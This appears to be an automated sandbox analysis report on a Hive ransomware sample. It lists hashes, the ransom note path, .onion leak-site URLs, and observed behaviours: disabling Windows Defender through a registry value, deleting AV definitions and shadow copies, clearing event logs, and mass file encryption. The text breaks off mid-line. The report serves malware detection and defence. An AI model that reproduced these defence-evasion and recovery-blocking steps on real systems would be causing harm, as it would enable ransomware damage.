Analysis
-
max time kernel
136s -
max time network
128s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 14:57
Static task
static1
Behavioral task
behavioral1
Sample
05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe
Resource
win7-en-20211208
General
-
Target
05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe
-
Size
4.0MB
-
MD5
a5d5890164cb1e203328bee0c2b8cd3f
-
SHA1
210ed20a9e07082cae923f5b2426fe44145d48d4
-
SHA256
05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b
-
SHA512
89dca80a954319f0e947c7e9a49081f3a859e8f81c076ae8f4b4902d8f5232b9883e21d150130e6bef27d51b7e03b9c90d87f4157f66d64a1eaeda5b27b0fd7f
Malware Config
Extracted
C:\Program Files\7-Zip\LdBi_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 3556 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1628 bcdedit.exe 1592 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.Upsell\Default\MSCasualGames.zip 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-20_altform-unplated.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sl-si\LdBi_HOW_TO_DECRYPT.txt 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_KMS_Client_AE-ul.xrm-ms.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_NAAAADQAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.DATABASECOMPARE.16.1033.hxn.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_LgAAAC4AAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Spacer\10px.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleMedTile.scale-200.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\ui-strings.js.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Bold.otf.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_CgAAAAoAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_CgAAAAoAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNotePageLargeTile.scale-200.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\xaml\onenote\ShareErrorMessagePage.xaml 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\tg_16x11.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Exchange.scale-100.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial2-ppd.xrm-ms.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_IAAAACAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Hedge.dxt 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\sz_60x42.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\eml.scale-32.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-140_8wekyb3d8bbwe\Assets\Office\PlaneCutKeepBottom.scale-140.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionLargeTile.scale-150.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_Subscription-ppd.xrm-ms.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_IAAAACAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\IEEE2006OfficeOnline.xsl.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_IgAAACIAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11701.1001.87.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\SplashScreen.scale-125.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Home.aapp.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Grace-ul-oob.xrm-ms.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_EgAAABIAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\core_icons_retina.png.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\ui-strings.js.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_KAAAACgAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7813_24x24x32.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarLargeTile.scale-100.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_FAAAABQAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\7-Zip\Lang\tt.txt.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_HgAAAB4AAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\ct.sym.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Retail-ul-phn.xrm-ms.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN058.XML.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\en-us\oregres.dll.mui.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_NAAAADQAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\TEE\fr-FR.PhoneNumber.SMS.model 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionLargeTile.scale-125.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-150.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hu-hu\ui-strings.js.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\tr-tr\ui-strings.js.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSplashLogo.scale-150.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Generic-Light.scale-400.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\ui-strings.js.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_HAAAABwAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\LdBi_HOW_TO_DECRYPT.txt 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\SelectAll.scale-180.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Fues\CheckMark.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\contrast-black\Logo.scale-150_contrast-black.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_OEM_Perp-ul-oob.xrm-ms.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DVA.api.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsMedTile.contrast-black_scale-100.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_MgAAADIAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\LdBi_HOW_TO_DECRYPT.txt 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL087.XML.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\msgr8es.dub.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\ProjectionCylindric.scale-180.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\HowToPlay\DailyChallenges\tile6.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosWideTile.contrast-white_scale-200.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_IgAAACIAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\README.txt.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_JAAAACQAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\SearchTrace.m1v.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-36_contrast-high.png 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2340 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 4016 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exepid process 2288 powershell.exe 2288 powershell.exe 2288 powershell.exe 4056 powershell.exe 4056 powershell.exe 4056 powershell.exe 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 3852 wevtutil.exe Token: SeBackupPrivilege 3852 wevtutil.exe Token: SeSecurityPrivilege 644 wevtutil.exe Token: SeBackupPrivilege 644 wevtutil.exe Token: SeSecurityPrivilege 864 wevtutil.exe Token: SeBackupPrivilege 864 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1352 wmic.exe Token: SeSecurityPrivilege 1352 wmic.exe Token: SeTakeOwnershipPrivilege 1352 wmic.exe Token: SeLoadDriverPrivilege 1352 wmic.exe Token: SeSystemProfilePrivilege 1352 wmic.exe Token: SeSystemtimePrivilege 1352 wmic.exe Token: SeProfSingleProcessPrivilege 1352 wmic.exe Token: SeIncBasePriorityPrivilege 1352 wmic.exe Token: SeCreatePagefilePrivilege 1352 wmic.exe Token: SeBackupPrivilege 1352 wmic.exe Token: SeRestorePrivilege 1352 wmic.exe Token: SeShutdownPrivilege 1352 wmic.exe Token: SeDebugPrivilege 1352 wmic.exe Token: SeSystemEnvironmentPrivilege 1352 wmic.exe Token: SeRemoteShutdownPrivilege 1352 wmic.exe Token: SeUndockPrivilege 1352 wmic.exe Token: SeManageVolumePrivilege 1352 wmic.exe Token: 33 1352 wmic.exe Token: 34 1352 wmic.exe Token: 35 1352 wmic.exe Token: 36 1352 wmic.exe Token: SeIncreaseQuotaPrivilege 3260 wmic.exe Token: SeSecurityPrivilege 3260 wmic.exe Token: SeTakeOwnershipPrivilege 3260 wmic.exe Token: SeLoadDriverPrivilege 3260 wmic.exe Token: SeSystemProfilePrivilege 3260 wmic.exe Token: SeSystemtimePrivilege 3260 wmic.exe Token: SeProfSingleProcessPrivilege 3260 wmic.exe Token: SeIncBasePriorityPrivilege 3260 wmic.exe Token: SeCreatePagefilePrivilege 3260 wmic.exe Token: SeBackupPrivilege 3260 wmic.exe Token: SeRestorePrivilege 3260 wmic.exe Token: SeShutdownPrivilege 3260 wmic.exe Token: SeDebugPrivilege 3260 wmic.exe Token: SeSystemEnvironmentPrivilege 3260 wmic.exe Token: SeRemoteShutdownPrivilege 3260 wmic.exe Token: SeUndockPrivilege 3260 wmic.exe Token: SeManageVolumePrivilege 3260 wmic.exe Token: 33 3260 wmic.exe Token: 34 3260 wmic.exe Token: 35 3260 wmic.exe Token: 36 3260 wmic.exe Token: SeIncreaseQuotaPrivilege 3260 wmic.exe Token: SeSecurityPrivilege 3260 wmic.exe Token: SeTakeOwnershipPrivilege 3260 wmic.exe Token: SeLoadDriverPrivilege 3260 wmic.exe Token: SeSystemProfilePrivilege 3260 wmic.exe Token: SeSystemtimePrivilege 3260 wmic.exe Token: SeProfSingleProcessPrivilege 3260 wmic.exe Token: SeIncBasePriorityPrivilege 3260 wmic.exe Token: SeCreatePagefilePrivilege 3260 wmic.exe Token: SeBackupPrivilege 3260 wmic.exe Token: SeRestorePrivilege 3260 wmic.exe Token: SeShutdownPrivilege 3260 wmic.exe Token: SeDebugPrivilege 3260 wmic.exe Token: SeSystemEnvironmentPrivilege 3260 wmic.exe Token: SeRemoteShutdownPrivilege 3260 wmic.exe Token: SeUndockPrivilege 3260 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2672 wrote to memory of 1188 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 2672 wrote to memory of 1188 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 1188 wrote to memory of 696 1188 net.exe net1.exe PID 1188 wrote to memory of 696 1188 net.exe net1.exe PID 2672 wrote to memory of 892 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 2672 wrote to memory of 892 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 892 wrote to memory of 1352 892 net.exe net1.exe PID 892 wrote to memory of 1352 892 net.exe net1.exe PID 2672 wrote to memory of 2220 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 2672 wrote to memory of 2220 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 2220 wrote to memory of 492 2220 net.exe net1.exe PID 2220 wrote to memory of 492 2220 net.exe net1.exe PID 2672 wrote to memory of 496 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 2672 wrote to memory of 496 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 496 wrote to memory of 3032 496 net.exe net1.exe PID 496 wrote to memory of 3032 496 net.exe net1.exe PID 2672 wrote to memory of 3296 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 2672 wrote to memory of 3296 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 3296 wrote to memory of 3276 3296 net.exe net1.exe PID 3296 wrote to memory of 3276 3296 net.exe net1.exe PID 2672 wrote to memory of 1512 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 2672 wrote to memory of 1512 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 1512 wrote to memory of 2744 1512 net.exe net1.exe PID 1512 wrote to memory of 2744 1512 net.exe net1.exe PID 2672 wrote to memory of 3336 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 2672 wrote to memory of 3336 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 3336 wrote to memory of 340 3336 net.exe net1.exe PID 3336 wrote to memory of 340 3336 net.exe net1.exe PID 2672 wrote to memory of 1196 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 2672 wrote to memory of 1196 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 1196 wrote to memory of 1256 1196 net.exe net1.exe PID 1196 wrote to memory of 1256 1196 net.exe net1.exe PID 2672 wrote to memory of 1500 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 2672 wrote to memory of 1500 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe net.exe PID 1500 wrote to memory of 1016 1500 net.exe net1.exe PID 1500 wrote to memory of 1016 1500 net.exe net1.exe PID 2672 wrote to memory of 2940 2672 